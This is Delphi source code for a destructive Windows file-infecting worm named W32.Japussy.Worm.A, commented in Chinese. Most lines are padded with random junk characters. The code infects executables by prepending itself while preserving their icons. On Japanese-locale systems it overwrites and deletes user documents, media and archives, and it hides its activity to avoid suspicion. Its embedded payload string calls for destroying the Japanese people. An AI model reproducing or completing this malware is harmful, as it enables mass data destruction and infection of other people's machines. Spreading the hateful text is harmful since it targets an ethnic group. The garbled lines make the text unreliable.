program Japussy; >DxHavqJ
uses !pdOTf9
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}; q#zdj R(
const + _FWL
HeaderSize = 82432; //病毒体的大小 NbY{6cv
IconOffset = $12EB8; //PE文件主图标的偏移量 8w*n D
LH*6SF T$k
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同 7R){P*9o
//查找2800000020的十六进制字符串可以找到主图标的偏移量 5gy(DHy
zjZg lO~q,
{ \'e9T:uo.b
HeaderSize = 38912; //Upx压缩过病毒体的大小 bW_`:
IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量 gkuxb$
aw;+onI
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe B8UI4f
} cZ E95}RL
IconSize = $2E8; //PE文件主图标的大小--744字节 Fo92T3hp
IconTail = IconOffset + IconSize; //PE文件主图标的尾部 (.f L
ID = $44444444; //感染标记 tU\\e^+S!
j>^dd{G!
//垃圾码,以备写入 !*M=C]S
Catchword = \'If a race need to be killed out, it must be Yamato. \' + wyML*/i~#
\'If a country need to be destroyed, it must be Japan! \' + I yj &)
\'*** W32.Japussy.Worm.A ***\'; qB+M-d7
{$R *.RES} C%8dL|~_0
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; |}2l U|+2
stdcall; external \'Kernel32.dll\'; //函数声明 $<[KR $A
var V\\H+ [
TmpFile: string; H?r |{.
Si: STARTUPINFO; ^J3^H/B=Q
Pi: PROCESS_INFORMATION; N^j3n>!K
IsJap: Boolean = False; //日文操作系统标记 3h7f F!
{ 判断是否为Win9x } j}[R&
function IsWin9x: Boolean; d10[p[n4j
var >V^hHb.S
Ver: TOSVersionInfo; xzTdxa0
begin Eq` !]_gJ
Result := False; M,Ka0W
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); _\"_u G^&
if not GetVersionEx(Ver) then y /t{zV\\zx
Exit; }p]=p f41
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x <`4Y7z6 :
Result := True; Q\\ztl7I
end; `tyj.^uP
{ 在流之间复制 } 5HBO Y
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; gw3KbCy
dStartPos: Integer; Count: Integer); GD ,0KtY
var uO+ryPM[$
sCurPos, dCurPos: Integer; ?<k=\'&!5b
begin BfO&,t#tN,
sCurPos := Src.Position; ix\\eOkA
dCurPos := Dst.Position; H!7e1tP\\2
Src.Seek(sStartPos, 0); )Fy *&
Dst.Seek(dStartPos, 0); :q(-*
Dst.CopyFrom(Src, Count); [=S,gN
Src.Seek(sCurPos, 0); (/\\Ksx
Dst.Seek(dCurPos, 0); TllW4~A
end; M% Cgq
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 } h}MKMk
procedure ExtractFile(FileName: string); {e>I1#s>u,
var -Cr>O|!,.
sStream, dStream: TFileStream; o#GM^q\\/`
begin gUAAndZ-x_
try vO/5V@jn
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); 2U;)qCa
try WZla,./
dStream := TFileStream.Create(FileName, fmCreate); zcwF
try O`x0 P2
sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分 3Qx_51f^
dStream.CopyFrom(sStream, sStream.Size - HeaderSize); twz&oJ%
finally &C>DoY
dStream.Free; r?nD$J
end; $N=:=}
finally GA@< m`
sStream.Free; `\' iB/
end; olX7?P0
except FaL5Op#
end; GX$\'CncLiE
end; .VF<+eB[m
{ 填充STARTUPINFO结构 } j+ X>f0v
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word); y%SrU%1{h
begin aM7P3U
Si.cb := SizeOf(Si); )~[L i#qm
Si.lpReserved := nil; AelkpJ
Si.lpDesktop := nil; Ly$ 4u7Tf
Si.lpTitle := nil; >=;C~?8S
Si.dwFlags := STARTF_USESHOWWINDOW; s{?gpZH
Si.wShowWindow := State; U#zrZ N&
Si.cbReserved2 := 0; NS$s{zR##
Si.lpReserved2 := nil; kzgR[.w(
end; o@B21x
{ 发带毒邮件 } hmh*] RR
procedure SendMail; J0$`Ysl
begin 0X\'JIJNK
//哪位仁兄愿意完成之? A+XuMms
end; kn. u/1
{ 感染PE文件 } bbpGFBS(
procedure InfectOneFile(FileName: string); D8~6, }2s
var yf n`Y wN
HdrStream, SrcStream: TFileStream; \\Bx}6Jb
IcoStream, DstStream: TMemoryStream; \"~05\"j
iID: LongInt; vUwRe->>G
aIcon: TIcon; LuEF
Infected, IsPE: Boolean; 9fV{|b^8
i: Integer; G{_qM3nD
Buf: array[0..1] of Char; 8u7& nr
begin Y[_/gBy@
try //出错则文件正在被使用,退出 z\\},s&
if CompareText(FileName, \'JAPUSSY.EXE\') = 0 then //是自己则不感染 w wzrUi
Exit; GB5iP&N]W
Infected := False; (hYZniM
IsPE := False; [ 3_N(/2h
SrcStream := TFileStream.Create(FileName, fmOpenRead); T(ef|{.
try X*t@[v\'#
for i := 0 to $108 do //检查PE文件头 /|Y&/#ZErP
begin }Q S U/|
SrcStream.Seek(i, soFromBeginning); k@c9wD#%
SrcStream.Read(Buf, 2); 2 K.tAl<,B
if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记 psG(F2\"%
begin uYb [02
IsPE := True; //是PE文件 K{z nxxo
Break; Mx2k5xO?
end; $NC#cOs:
end; QsrRc%WM
SrcStream.Seek(-4, soFromEnd); //检查感染标记 4XWe2LxA\'
SrcStream.Read(iID, 4); 7X<HA D
if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染 P|~6G/=i
Infected := True; M8o F@}/
finally {FV%%U
SrcStream.Free; viOzG0 )L
end; OrS~LOj0zc
if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出 d-=\',p1xV.
Exit; hsh\\\'3mg
IcoStream := TMemoryStream.Create; )%o,7j
DstStream := TMemoryStream.Create; gOB$kp
try \"IqR1OtS
aIcon := TIcon.Create; 1 5YS8\\`
try 8}\\.=<\\vP
//得到被感染文件的主图标(744字节),存入流 $t3kM-
aIcon.ReleaseHandle; XIs|D+uQg
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0); ! !.zZ@Hx
aIcon.SaveToStream(IcoStream); ~:ute2y
finally J`>2pcw
aIcon.Free; pkKc2r l
end; Xb_4 DJi
SrcStream := TFileStream.Create(FileName, fmOpenRead); (rt-g;
//头文件 6Wb8|4
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); 9/9T8IpR$
try N4@5 +HJ-
//写入病毒体主图标之前的数据 [) JWSJ
CopyStream(HdrStream, 0, DstStream, 0, IconOffset); YIN]_kV~/R
//写入目前程序的主图标 h#cN_g^>
CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize); i Tnt\\%
//写入病毒体主图标到病毒体尾部之间的数据 e$6]Tz (
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail); ;w;:Vp_
//写入宿主程序 |=_)C3~!
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size); 162`R[W
//写入已感染的标记 5X; GfR?
DstStream.Seek(0, 2); ]=b8g\'Ly)
iID := $44444444; v w~s[(
DstStream.Write(iID, 4); ]aJI
finally pA\"u4
HdrStream.Free; xH2U
end; (~~jD
finally y43<JwY
SrcStream.Free; i#V5]o
IcoStream.Free; +>l|`gw
DstStream.SaveToFile(FileName); //替换宿主文件 3KagX=!O<
DstStream.Free; /ZJ WBmyd
end; k=3:![
except; `o|G.c
end; q$C >~
end; lV o
{ 将目标文件写入垃圾码后删除 } ,d:`VUDd3
procedure SmashFile(FileName: string); M,\'y n _
var IeJ=|R
FileHandle: Integer; qx*wNJe
i, Size, Mass, Max, Len: Integer; b8uD#>*`q
begin tZ*c*3J
try |j Zo(Lds
SetFileAttributes(PChar(FileName), 0); //去掉只读属性 7Calja +
FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件 hZyIU)gSw
try {<9He^I#
Size := GetFileSize(FileHandle, nil); //文件大小 *jSu|(*7C
i := 0; %jYT2A$
Randomize; ~JNe0{ {!
Max := Random(15); //写入垃圾码的随机次数 : I\'gZvGU
if Max < 5 then {~PG{lS5
Max := 5; Qq-m#Yu^$j
Mass := Size div Max; //每个间隔块的大小 E|!XVzl
Len := Length(Catchword); A%Lv60
while i < Max do p v8C,3
begin em4m\' \\
FileSeek(FileHandle, i * Mass, 0); //定位 4y 4<z0v
//写入垃圾码,将文件彻底破坏掉 Nw{V f!
FileWrite(FileHandle, Catchword, Len); 0Jum{8p 2
Inc(i); OKgL$dF\\
end; abA!?- x
finally 1;8;H,/15%
FileClose(FileHandle); //关闭文件 *R?sNmz
end; FIV{J.a}E
DeleteFile(PChar(FileName)); //删除之 LZuKbc
except l+G&M%
end; Lz ]Z52ah
end; m=L3>;o$
{ 获得可写的驱动器列表 } G%S,R_]K
function GetDrives: string; \'Y7F$(SaG
var &x|\'5{!y>
DiskType: Word; @IE ex-
D: Char; !%GDlK%
Str: string; +a sTu><#Q
i: Integer; #!`.Xo?1
begin m2n$EO
for i := 0 to 25 do //遍历26个字母 voXL1r
begin W/CfIhnN
D := Chr(i + 65); \'M<$+HZL
Str := D + \':\\\'; d gi>TVj
DiskType := GetDriveType(PChar(Str)); !\\HG<B= q
//得到本地磁盘和网络盘 C,t+-Hnd
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then j\"Q!a3:+q
Result := Result + D; 2m%b*IIs
end; =sd FQo`A
end; 4)(.LbIs{&
{ 遍历目录,感染和摧毁文件 } ~.A4_OIq
procedure LoopFiles(Path, Mask: string); hf 82
var >+gi61$
i, Count: Integer; Y:gK;6#
Fn, Ext: string; =3$z\'w &<
SubDir: TStrings; T,?g IJ1
SearchRec: TSearchRec; l~!XdJ4
Msg: TMsg; .rj82yi
function IsValidDir(SearchRec: TSearchRec): Integer; P4 r\'#c
begin #0X, #u.
if (SearchRec.Attr <> 16) and (SearchRec.Name <> \'.\') and l%%9OC]\'
(SearchRec.Name <> \'..\') then Xb+XB
Result := 0 //不是目录 \'=7J!|y1}
else if (SearchRec.Attr = 16) and (SearchRec.Name <> \'.\') and 5AA./}5U
(SearchRec.Name <> \'..\') then ara1@\"h1U
Result := 1 //不是根目录 4#J gjzoI
else Result := 2; //是根目录 # d&s
end; `VjEd
begin E~;FC+Vf(
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then Uu`@x?
begin OC K/`#w&
repeat wGJv&6O
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑 jssTItJu
if IsValidDir(SearchRec) = 0 then T_k&[x
begin ,0\\ GU;(y
Fn := Path + SearchRec.Name; 9ENW[+F
Ext := UpperCase(ExtractFileExt(Fn)); 9cc=z@l
if (Ext = \'.EXE\') or (Ext = \'.SCR\') then )T?YiNL
begin 4j>*J5\'-
InfectOneFile(Fn); //感染可执行文件 }R{3~N$5V
end *29YyU%
else if (Ext = \'.HTM\') or (Ext = \'.HTML\') or (Ext = \'.ASP\') then ;[as^P
begin GwapCRhjh
//感染HTML和ASP文件,将Base64编码后的病毒写入 =]fYi6O
//感染浏览此网页的所有用户 NHd5%: n
//哪位大兄弟愿意完成之? %}=3;7
end 50/5`AkL
else if Ext = \'.WAB\' then //Outlook地址簿文件 w\' ;{pxf.
begin W`;@ (M9
//获取Outlook邮件地址 hU,DP i}
end Mzn. >
else if Ext = \'.ADC\' then //Foxmail地址自动完成文件 (7V>IsO66
begin OpG#<|a
//获取Foxmail邮件地址 X7J 6nuI
end H`>&A=if:
else if Ext = \'IND\' then //Foxmail地址簿文件 JL#KtwB0
begin dRsoF7
//获取Foxmail邮件地址 iL lJsGh^R
end %Q#@RwA+
else R}< S4,=E
begin Q V,f-[9
if IsJap then //是倭文操作系统 D[[ WBJS
begin ]f -)4D.
if (Ext = \'.DOC\') or (Ext = \'.XLS\') or (Ext = \'.MDB\') or H?nqmV
(Ext = \'.MP3\') or (Ext = \'.RM\') or (Ext = \'.RA\') or A bv&[V
(Ext = \'.WMA\') or (Ext = \'.ZIP\') or (Ext = \'.RAR\') or puau$k
(Ext = \'.MPEG\') or (Ext = \'.ASF\') or (Ext = \'.JPG\') or :Z ,9Y
(Ext = \'.JPEG\') or (Ext = \'.GIF\') or (Ext = \'.SWF\') or .!?9 3Q
(Ext = \'.PDF\') or (Ext = \'.CHM\') or (Ext = \'.AVI\') then : C`Av|f
SmashFile(Fn); //摧毁文件 @&5[LiW
end; 7.WA\\Rq%
end; V4YuZR
end; u~XE *Vb
//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑 jLXl boww_
Sleep(200); Hb~\"ki![
until (FindNext(SearchRec) <> 0); m/p.OpoE
end; NxFM*
FindClose(SearchRec); ZtzdRJ
SubDir := TStringList.Create; iv<+2XZ3
if (FindFirst(Path + \'*.*\', faDirectory, SearchRec) = 0) then K?-0JkM}
begin #rybNpyV
repeat Y!%`vq; %
if IsValidDir(SearchRec) = 1 then kZH.lkB$TH
SubDir.Add(SearchRec.Name); #ewa _@9
until (FindNext(SearchRec) <> 0); n_L/c*dw
end; Cj%ZN +
FindClose(SearchRec); 1gj t9
Count := SubDir.Count - 1; vTDLeaP?
for i := 0 to Count do p:sQ\\R+}}
LoopFiles(Path + SubDir.Strings + \'\\\', Mask); jc,I{F.+
FreeAndNil(SubDir); Q\'Gy
end; sqP&1
{ 遍历磁盘上所有的文件 } OoRTm-X*FH
procedure InfectFiles; I ;xB Rm#
var ,$A&j6aE
DriverList: string; Goeo[^W_Z
i, Len: Integer; \"7neAx
begin ig?r2+_A
if GetACP = 932 then //日文操作系统 2*>euD j,S
IsJap := True; //DriverList := GetDrives; //得到可写的磁盘列表 `2 1HH\'
Len := Length(DriverList); {I(Na1y%2
while True do //死循环 /[u@fSt9s
begin dXGKqz1^
for i := Len downto 1 do //遍历每个磁盘驱动器 Df 8%\'
LoopFiles(DriverList + \':\\\', \'*.*\'); //感染之 2b0 <RH]
SendMail; //发带毒邮件 ]N D9SD7f
Sleep(1000 * 60 * 5); //睡眠5分钟 #]B>M,\"@?
end; TXedc9P
end; )J, U qE
{ 主程序开始 } R3zEYK
begin b km%`/
if IsWin9x then //是Win9x M~2Z@*H
RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程 \')hlY`S7
else //WinNT 1G]-9(L>Q
begin \"Vb^qlv~$d
//远程线程映射到Explorer进程 ,3\\&<x{!S
//哪位兄台愿意完成之? +VA ~*tU
end; <^s.>Gt{}.
//如果是原始病毒体自己 a}zz~n
if CompareText(ExtractFileName(ParamStr(0)), \'Japussy.exe\') = 0 then E*WEh*
InfectFiles //感染和发邮件 a3iA*}1K
else //已寄生于宿主程序上了,开始工作 iS,\'v[\'>
begin sXE$s%P
TmpFile := ParamStr(0); //创建临时文件 #dbNGb7J
Delete(TmpFile, Length(TmpFile) - 4, 4); UFrx^Os+k
TmpFile := TmpFile + #32 + \'.exe\'; //真正的宿主文件,多一个空格 N^x~`sO
ExtractFile(TmpFile); //分离之 j|# jgBA!
FillStartupInfo(Si, SW_SHOWDEFAULT); 6~\\(
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True, g$\"D|8A
0, nil, \'.\', Si, Pi); //创建新进程运行之 L
InfectFiles; //感染和发邮件 ` ;-n| kF
end; QAJW}P1
end. |